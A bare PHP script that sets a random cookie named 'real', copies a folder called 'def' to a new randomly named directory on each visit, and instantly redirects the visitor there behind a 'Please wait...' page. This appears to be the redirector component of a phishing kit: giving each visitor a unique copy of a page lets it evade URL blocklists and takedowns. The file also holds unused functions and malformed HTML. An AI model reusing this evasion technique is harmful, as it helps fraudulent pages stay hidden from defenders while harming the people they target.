<?php
// Set a cookie with a random value
$cookieValue = md5((string)rand(0, 1000000));
setcookie("real", $cookieValue);

// Generate the destination path using randomization
function generateDestinationPath(): string {
    $random = rand(0, 10000000);
    $md5    = md5((string)$random);
    $base   = base64_encode($md5);
    return 'id/' . md5($base);
}

// Duplicate directories and files with randomness in destination paths
function duplicate(string $src, string $dst): void {
    if (!is_dir($src)) return;

    $dir = opendir($src);
    if (!$dir) return;

    @mkdir($dst);
    while (false !== ($file = readdir($dir))) {
        if ($file == '.' || $file == '..') continue;

        if (is_dir("$src/$file")) {
            duplicate("$src/$file", "$dst/$file");
        } else {
            copy("$src/$file", "$dst/$file");
        }
    }
    closedir($dir);
}

$src = "def";
$dst = generateDestinationPath();
duplicate($src, $dst);

// Generate a random color
function generateRandomColor(): string {
    return sprintf('#%06X', mt_rand(0, 0xFFFFFF));
}

// Generate random text for the lorem ipsum placeholder
function generateRandomText(): string {
    $texts = [
        "Lorem ipsum dolor sit amet, consectetur adipisicing elit.",
        "Randomly generated text to keep things interesting.",
        "This is another example of randomness at play.",
        "A different piece of text shows up here each time.",
        "The quick brown fox jumps over the lazy dog, or does it?"
    ];
    return $texts[array_rand($texts)];
}

// Generate random query string parameters for the redirect
$queryString = http_build_query([
    'param1' => rand(0, 1000),
    'param2' => rand(1000, 2000)
]);
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="refresh" content="0;url=<?= $dst . "?" . $queryString ?>">
    <title>Please wait...</title>


</body>
</html>
